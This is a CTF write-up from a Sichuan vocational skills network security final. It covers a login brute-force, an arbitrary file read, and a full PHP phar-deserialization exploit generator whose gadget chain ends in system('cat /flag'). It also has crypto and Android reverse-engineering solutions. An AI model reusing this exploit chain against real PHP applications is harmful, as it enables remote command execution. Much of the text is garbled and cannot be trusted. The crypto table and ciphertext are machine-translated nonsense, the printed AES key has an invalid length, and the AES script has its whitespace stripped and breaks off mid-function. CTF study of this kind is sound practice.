
Title: Sichuan Provincial Employee Vocational Skills Competition Network Security Final WP


Morning CTF part

web

simplelogin

Brute-forced the login form with yakit; as far as I recall the password was a123456:

cwfx23ohon417551.png

pppp

index.php has an arbitrary file read (`file_get_contents` on a user-supplied path) and, more importantly for later, two classes that together form a deserialization gadget chain:

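<?php
// upload.php   <- comment present in the original listing (presumably a hint that an upload.php exists)
error_reporting(0);        // warnings are suppressed, so failed reads/calls stay silent
highlight_file(__FILE__);  // prints this file's own source to the visitor (that is how it was read)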

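class A {
    public $a;

    // Gadget entry point: whatever is stored in $a is called as a function when the
    // object is destroyed, e.g. right after it has been unserialized from phar metadata.
    // The writeup listing showed `$this-$a`; `$this->a` is what the chain needs, since the
    // B object is assigned to the public property `a` (see phar.php below).
    public function __destruct()
    {
        $s = $this->a;
        $s();
    }
}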

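class B {
    public $cmd;

    // Makes a B instance callable, so A::__destruct's `$s()` lands here.
    function __invoke() {
        return $this->start();
    }

    // Sink: the property goes straight into system(). Whoever controls the
    // unserialized object controls the shell command.
    function start() {
        echo system($this->cmd);
    }
}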

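// Arbitrary file read. The only filter is a literal (case-sensitive) substring check for
// 'flag' on the raw path; stream wrappers such as phar:// are not blocked, which is what
// turns this read primitive into deserialization of an uploaded phar archive.
if (isset($_GET['file'])) {
    if (strstr($_GET['file'], 'flag')) {
        die('Get out!');
    }
    echo file_get_contents($_GET['file']);
}
?>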

Reading upload.php through that file read:

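<?php
error_reporting(0);
if (isset($_FILES['file'])) {
    mkdir('upload');
    $uid = uniqid();
    // The extension is computed but never used: every upload is stored as .png.
    $ext = explode('.', $_FILES['file']['name']);
    $ext = end($ext);
    // NOTE: the listing assigns $uid but reads $uuid (undefined). If that is not a
    // transcription error, then with error_reporting(0) every upload lands at the fixed
    // path upload/.png. Either way the response echoes the final path, so the uploader
    // knows exactly where the file ended up. Only the name is changed - the contents are
    // never inspected, so a phar archive survives the rename intact.
    move_uploaded_file($_FILES['file']['tmp_name'], 'upload/' . $uuid . '.png');
    echo 'UploadSuccess!FilePath:upload/' . $uuid . '.png';
}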

The upload handler renames every file to `upload/<id>.png` regardless of its original extension, but it never looks at the contents - so a phar archive can be uploaded under a .png name and the server tells us the resulting path.

Upload a phar archive and trigger it through index.php: `file_get_contents('phar://upload/<name>.png')` makes PHP parse the archive and unserialize its metadata, so `A::__destruct` calls `$this->a()`, which is the `B` object, whose `__invoke` → `start()` runs `system('cat /flag')`. The `flag` filter only inspects the path string, so `phar://upload/...png` passes. Note this relies on PHP unserializing phar metadata automatically on `phar://` access, which PHP 8.0 removed - so the target is presumably running PHP 7.x. Payload generator:

//phar.php

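<?php // phar.php
class A {
    public $a;

    // Same gadget as on the target: the stored property is invoked on destruction.
    public function __destruct()
    {
        $s = $this->a;
        $s();
    }
}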

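class B {
    public $cmd;

    function __construct() {
        // Listing showed 'catflag' (spacing lost in extraction); overwritten below anyway.
        $this->cmd = 'cat flag';
    }

    // Callable, so that A::__destruct's `$s()` ends up in start().
    function __invoke() {
        return $this->start();
    }

    function start() {
        system($this->cmd);
    }
}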

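// Build the object graph: A::__destruct -> B::__invoke -> system('cat /flag')
$b = new B();
$b->cmd = 'cat /flag';
$a = new A();
$a->a = $b;

@unlink('phar.phar');
$phar = new Phar('phar.phar');               // the file name must end in .phar while building
$phar->startBuffering();
$phar->setStub('<?php __HALT_COMPILER();');   // minimal stub; the server does no content sniffing, so no fake image header is needed
$phar->setMetadata($a);                       // serialized into the manifest; unserialized again on phar:// access
$phar->addFromString('a.txt', 'abb');         // a phar needs at least one file entry
$phar->stopBuffering();                       // signature is computed here
// Generating the archive requires phar.readonly=Off in the *local* php.ini (attacker side, not the target).
?>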

Upload the archive, then request `index.php?file=phar://upload/<returned-name>.png` to fire the chain:

htmdk4fshkz17555.png

misc

ftp

Extract the zip from the FTP traffic; the archive password is the same one seen in the capture, password1234567890.

0eys1alfu5o17558.png

crypto

baby_Words on Zen with Buddha

The ciphertext was produced by AES-CBC, then every byte was XORed with 64 and mapped to a character of the table below; invert the mapping (character → table index, XOR 64) to recover the raw AES ciphertext and decrypt it. (The character table and ciphertext string were mangled by machine translation in this copy of the page - take them from the original challenge files.)

ruShiWoWen=[

'无', 'mu', 'monk', 'room', 'art', 'ser', 'ser', 'ser', 'ser', 'ser', 'ser', 'ser', 'ser', 'ser', 'ser', 'ser', 'ser', 'ser', 'ser', 'ser', 'ser', 'ser', 'ser', 'ser', 'ser', 'ser', 'ser', 'ser', 'ser', 'ser', 'ser', 'ser', 'ser', 'ser', 'ser', 'ser', 'ser', 'ser', 'ser', 'ser', 'ser', 'ser', 'ser'

'未', 'li', 'blin', 'due', 'mul', 'pregnancy', 'san', 'black', 'naked', 'bean', 'special', 'div', 'reach', 'return', 'length', 'length', 'length', 'length', 'length', 'length',

'li', 'written', 'number', 'responsible', 'respect', 'ro', 'respect', 'respect', 'know', 'three', 'bing', 'no', 'responsible', 'responsible', 'responsible', 'responsible', 'responsible', 'responsible', 'responsible', 'responsible', 'responsible', 'responsible', 'responsible', 'responsible', 'responsible', 'responsible', 'responsible', 'responsible', 'responsible', 'responsible', 'responsible', 'responsible',

'Insight', 'thought', 'dream', 'until', 'remove', 'horrible', 'restrained', 'restrained', 'restrained', 'restrained', 'will', 'wisdom', 'old', 'toward',

'roar', 'foot', 'you', 'wang', 'you', 'won', 'mu', 'mu', 'light', 'protect', 'jin', 'harmony', 'going', 'treasure', 'win', 'tong', 'won', 'win', 'tong',

'medicine', 'teacher', 'little', 'living', 'pure', 'deal', 'mountain', 'good', 'pass', 'go', 'seven', 'not', 'come', 'smart', 'smart', 'smart', 'smart', 'smart', 'smart', 'smart', 'smart', 'smart',

'Cause', 'Thousand', 'Five', 'Hundred', 'Ten Thousand', 'Flowers', 'Billions', 'Decision', 'Six', 'Fang', 'Name', 'Name', 'Tong', 'Yue', 'Yun', 'Dian', 'Miracle',

'Zun', 'tree', 'root', 'west', 'soap', 'flame', 'north', 'qing', 'number', 'element', 'improve', 'head', 'lower', 'silence', 'quantity', 'element', 'element', 'four', 'element', 'four', 'element', 'four', 'element', 'four', '

'Do', 'Shi', 'Ga', 'Mu', 'Ni', 'Le', 'A', 'Du', 'Zhong', 'Yang', 'Zhong', 'Zhong', 'Zhong', 'Zhong', 'Zhong', 'Zhong', 'Zhong', 'Zhong', 'Zhong', 'Zhong', 'Zhong', 'Zhong', 'Zhong', 'Zhong', 'Zhong', 'Zhong', 'Zhong', 'Zhong', 'Zhong', 'Zhong', 'Zhong', 'Zhong', 'Zhong', 'Zhong', 'Zhong', 'Zhong', 'Zhong', 'Zhong', 'Zhong', 'Zhong', 'Zhong', 'Zhong', 'Zhong'

'action', 'in', 'empt', 'empt', 'compassion', 'worry', 'someone', 'satisfaction', 'stable', 'rest', 'day', 'night', 'cultivation',

'hold', 'heart', 'seeking', 'recitation', 'recitation', 'this', 'sutra', 'energy', 'death', 'elimination', 'elimination', 'toxic', 'harm', 'high', 'open', 'text',

'super', 'lift', 'cool', 'as if', 'thought', 'that', 'that', 'emperor', 'vi', 'true', 'ling', 'qian', 'shu', 'ha', 'respect',

'Gift', 'Feng', 'Ancestor', 'First', 'Filial Piety', 'Double', 'My Master', 'Stay', 'My Master', 'Love', 'Brother', 'Brother', 'First', 'Friend', 'Friend', 'Friend', 'Friend',

'Music', 'Zen', 'Clan', 'Home', 'My', 'My', 'Teaching', 'Sun', 'Time', 'Tire', 'Bulse', 'Yin', 'Yin', 'Difficult', 'Economic',

'urgent', 'soft', 'soft', 'shoulder', 'creation', 'soft', 'soft', 'shu', 'shu', 'shu', 'shu', 'creation', 'repet', 'don', 'don', 'don', 'don', 'don', 'don', 'don', 'don', 'don', 'don', 'don', 'don', 'don', 'don', 'don', 'don', 'don', 'don', 'don', 'don', 'don', 'don', 'don', 'don', 'don', 'don', 'don', 'don', '

'kill', 'release', 'bridge', 'road', 'cove', 'little', 'draw', 'draw', 'draw', 'sleep', 'sweep', 'sweep', 'sweep', 'sweep', 'sweep', 'don', 'invest', 'invest']

enc='The person who recites the love is guarding the Mengzabao and lying the lying of the lying of the heart, and killing the lying of the heart, and worrying, and reciting the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the

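def decode_table(enc: str, table: list[str]) -> bytes:
    """Map each character of *enc* back to its index in *table* and undo the XOR with 64.

    The challenge XORed every byte of the AES ciphertext with 64 and used the result as
    an index into the word table; this reverses that, yielding the raw ciphertext bytes.
    Raises ValueError if a character is not in the table or the recovered value is not
    a byte.
    """
    return bytes(table.index(ch) ^ 64 for ch in enc)


if __name__ == "__main__":
    from Crypto.Cipher import AES          # pycryptodome
    from Crypto.Util.Padding import unpad

    # ruShiWoWen (the table) and enc (the ciphertext string) are defined above.
    ciphertext = decode_table(enc, ruShiWoWen)

    # NOTE(review): as printed in the writeup this key is 29 bytes, which AES.new()
    # rejects (AES keys are 16/24/32 bytes); the real challenge presumably truncated or
    # otherwise derived the key - confirm against the challenge source.
    KEY = b'DASCTF@Key@^_^@Encode!Buddha!'
    IV = b'IV|DASCTF|OvO|IV'               # 16 bytes, one AES block

    plaintext = AES.new(KEY, AES.MODE_CBC, IV).decrypt(ciphertext)
    print(plaintext)                        # raw output, padding still attached
    try:
        print(unpad(plaintext, AES.block_size))
    except ValueError:
        pass                                # not valid PKCS#7 padding: the raw print above stands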

2bsldbye20n17561.png

re

NormalAndroid

Opening the APK in jadx shows that the Java side calls just one native function in the bundled .so, so the rest of the work is in IDA:

u0nrsz2t2lx17562.png

A key-like constant is visible, together with the routine that transforms it before use:

mre1puao3uy17563.png

surface:

grgyesvf5bo17564.png

surface

a203ugiarw417565.png

The encryption routine turns out to be AES, but with a custom (modified) S-box:

k5exqyfylk517566.png

So the plan is to take an existing pure-Python AES implementation, swap in the modified S-box, and decrypt with the transformed key. The network was cut during the competition and the script was not saved at the time, so this part was not finished; the listing below is the reference implementation with the S-box replaced (whitespace was stripped by the page extraction):

fromCrypto.Util.numberimportlong_to_bytes,bytes_to_long

# based on https://github.com/bozhu/AES-Python/blob/master/aes.py (only Sbox replaced)

# S-box recovered from the binary. This is NOT the standard AES S-box (which starts
# 0x63, 0x7C, ...); it is the only difference from the reference implementation this
# file is based on. 256 entries, 10 per line; InvSbox below is derived from it.
Sbox=(
0xBE,0xB4,0x9F,0x70,0xDB,0xAD,0x31,0x30,0x6C,0x87,
0x74,0x27,0xC9,0x4C,0x67,0x62,0x0A,0x36,0x08,0xC8,
0x96,0x32,0x00,0xF1,0x38,0x65,0xEC,0xED,0x44,0x25,
0xAA,0x33,0x86,0xEF,0x0D,0x19,0x7D,0xD5,0x45,0xFB,
0x8D,0x61,0xFE,0x50,0x47,0x7E,0x7C,0xF9,0x01,0xDE,
0xFF,0xE1,0xAC,0x5D,0xB5,0x8E,0x48,0xBF,0x90,0x9D,
0x79,0xCB,0xA6,0xA9,0xFC,0x34,0xCF,0x63,0x5A,0x99,
0x98,0xB8,0x92,0x2D,0x02,0x89,0x2C,0x3B,0x15,0x72,
0x5E,0x60,0x29,0x6F,0x0B,0x24,0x6D,0x1C,0x5B,0xE0,
0x37,0xA4,0xCC,0x12,0x93,0xA7,0x09,0xC6,0xB6,0x8F,
0x04,0x20,0xE8,0x46,0xB1,0xAE,0x3A,0x68,0x81,0xCE,
0x2B,0x0C,0xB3,0x3E,0xC0,0x0E,0x4D,0xD8,0xD2,0xA2,
0x9E,0x56,0x28,0xB0,0x35,0x1B,0x5F,0xF5,0x05,0xBC,
0x3C,0x4F,0x8C,0xE6,0xF6,0x75,0xF4,0xF8,0xDD,0x11,
0xC1,0xB9,0x4E,0x97,0xD6,0xF2,0xE4,0xD1,0x82,0xD3,
0x03,0x8B,0x4B,0xCA,0x64,0xEB,0xAB,0x71,0xA1,0xBA,
0xA8,0x6A,0x1E,0x1A,0xA5,0x49,0x6E,0x53,0x66,0x39,
0x51,0xE9,0x26,0xC4,0xDA,0x55,0x3F,0xEA,0x85,0x8A,
0xD9,0x13,0x69,0x1F,0xE2,0x7F,0x2F,0xC5,0x88,0x57,
0x73,0xA3,0xE3,0x0F,0xBB,0x18,0xE5,0x42,0x22,0x52,
0x43,0x80,0x2A,0x6B,0x17,0xD7,0x23,0x06,0x58,0x1D,
0x7A,0x84,0xE7,0xEE,0xD0,0x41,0xD4,0xBD,0xA0,0xC3,
0xC2,0xFD,0x21,0x54,0xDF,0x7B,0xB7,0xF0,0xB2,0x77,
0x3D,0x07,0x78,0x16,0x9C,0x59,0xAF,0x2E,0x83,0xFA,
0x9B,0x95,0xF7,0x40,0x94,0xF3,0xCD,0xC7,0x91,0x10,
0xDC,0x4A,0x14,0x9A,0x5C,0x76
)

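# Inverse S-box for decryption. The S-box above was transcribed by hand from the
# binary, so check it is a permutation first: a duplicated or missing value would
# otherwise make Sbox.index() silently pick the wrong slot or fail with an
# unhelpful ValueError deep inside decryption. Runs once at import.
if sorted(Sbox) != list(range(256)):
    raise ValueError("Sbox is not a permutation of 0..255 - check the transcription")
InvSbox = [Sbox.index(i) for i in range(256)]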

# learnt from http://cs.ucsb.edu/~koc/cs178/projects/JT/aes.c

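def xtime(a: int) -> int:
    """Multiply byte *a* by x (i.e. by 2) in GF(2^8) modulo the AES polynomial.

    Shift left; if bit 7 was set the result overflowed a byte, so reduce by 0x1B
    and mask back to 8 bits. The operators (<<, &) were lost in the page
    extraction; this is the reference form from bozhu/AES-Python.
    """
    return (((a << 1) ^ 0x1B) & 0xFF) if (a & 0x80) else (a << 1)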

# Round constants for the key schedule: successive powers of x in GF(2^8).
# Index 0 is unused padding so that Rcon[i // 4] lines up with the word index,
# as in the reference implementation.
Rcon = (
    0x00, 0x01, 0x02, 0x04, 0x08, 0x10, 0x20, 0x40, 0x80, 0x1B, 0x36,
    0x6C, 0xD8, 0xAB, 0x4D, 0x9A, 0x2F, 0x5E, 0xBC, 0x63, 0xC6, 0x97,
    0x35, 0x6A, 0xD4, 0xB3, 0x7D, 0xFA, 0xEF, 0xC5, 0x91, 0x39,
)

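def text2matrix(text: int) -> list[list[int]]:
    """Split a 128-bit integer into a 4x4 byte matrix (row-major, most significant first).

    Byte i of the big-endian representation lands at matrix[i // 4][i % 4], so
    matrix[0][0] is the most significant byte. Bits above 128 are simply ignored
    by the shift-and-mask. The operators (>>, &) were lost in the page
    extraction; this is the reference form.
    """
    flat = [(text >> (8 * (15 - i))) & 0xFF for i in range(16)]
    return [flat[r:r + 4] for r in range(0, 16, 4)]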

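def matrix2text(matrix: list[list[int]]) -> int:
    """Inverse of text2matrix: pack a 4x4 byte matrix into a 128-bit integer.

    matrix[i][j] is placed at bit offset 120 - 8 * (4 * i + j), i.e. row-major with
    matrix[0][0] most significant. The shift operator (<<) was lost in the page
    extraction; this is the reference form.
    """
    text = 0
    for i in range(4):
        for j in range(4):
            text |= matrix[i][j] << (120 - 8 * (4 * i + j))
    return text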

classAES:

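def __init__(self, master_key: int) -> None:
    """Expand *master_key* (a 128-bit integer) into self.round_keys via change_key()."""
    self.change_key(master_key)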

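def change_key(self, master_key: int) -> None:
    """Run the AES-128 key schedule for *master_key* and store it in self.round_keys.

    self.round_keys ends up as 44 words (each a list of 4 bytes): words 0-3 are the
    key itself; every later word is the word four back XOR the previous word, and
    every fourth word first rotates and substitutes the previous word and folds in
    Rcon. The substitution uses the *modified* Sbox from this file - the binary's
    key schedule is assumed to use the same table; confirm in IDA if decryption
    still fails with the recovered key. Only 10 rounds (AES-128) are expanded,
    matching encrypt()/decrypt(), which hard-code round_keys[40:] as the last
    round key.
    """
    self.round_keys = text2matrix(master_key)
    for i in range(4, 4 * 11):
        prev = self.round_keys[i - 1]
        back = self.round_keys[i - 4]
        if i % 4 == 0:
            # RotWord (index (j + 1) % 4) + SubWord, with Rcon folded into byte 0
            word = [back[j] ^ Sbox[prev[(j + 1) % 4]] for j in range(4)]
            word[0] ^= Rcon[i // 4]
        else:
            word = [back[j] ^ prev[j] for j in range(4)]
        self.round_keys.append(word)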

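def encrypt(self, plaintext: int) -> int:
    """Encrypt one 128-bit block (integer in, integer out) with the expanded round keys.

    Standard AES-128 layout: initial AddRoundKey, nine full rounds, then a final
    round without MixColumns. SubBytes uses the modified Sbox. The working state is
    also left in self.plain_state, as in the reference implementation.
    """
    self.plain_state = text2matrix(plaintext)
    self.__add_round_key(self.plain_state, self.round_keys[:4])
    for rnd in range(1, 10):
        self.__round_encrypt(self.plain_state, self.round_keys[4 * rnd:4 * (rnd + 1)])
    # final round: no MixColumns
    self.__sub_bytes(self.plain_state)
    self.__shift_rows(self.plain_state)
    self.__add_round_key(self.plain_state, self.round_keys[40:])
    return matrix2text(self.plain_state)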

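def decrypt(self, ciphertext: int) -> int:
    """Decrypt one 128-bit block (integer in, integer out): encrypt() run backwards.

    Undo the final round first (AddRoundKey, InvShiftRows, InvSubBytes), then nine
    inverse rounds, then the initial AddRoundKey. The working state is also left in
    self.cipher_state.
    """
    self.cipher_state = text2matrix(ciphertext)
    self.__add_round_key(self.cipher_state, self.round_keys[40:])
    self.__inv_shift_rows(self.cipher_state)
    self.__inv_sub_bytes(self.cipher_state)
    for rnd in range(9, 0, -1):
        self.__round_decrypt(self.cipher_state, self.round_keys[4 * rnd:4 * (rnd + 1)])
    self.__add_round_key(self.cipher_state, self.round_keys[:4])
    return matrix2text(self.cipher_state)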

def__add_round_key(self,s,k):

foriinrange(4):

forjinrange(4):

s[i][j]^=k[i][j]

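def __round_encrypt(self, state_matrix: list[list[int]], key_matrix: list[list[int]]) -> None:
    """One full AES round in place: SubBytes, ShiftRows, MixColumns, AddRoundKey."""
    self.__sub_bytes(state_matrix)
    self.__shift_rows(state_matrix)
    self.__mix_columns(state_matrix)
    self.__add_round_key(state_matrix, key_matrix)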

def__round_decrypt(
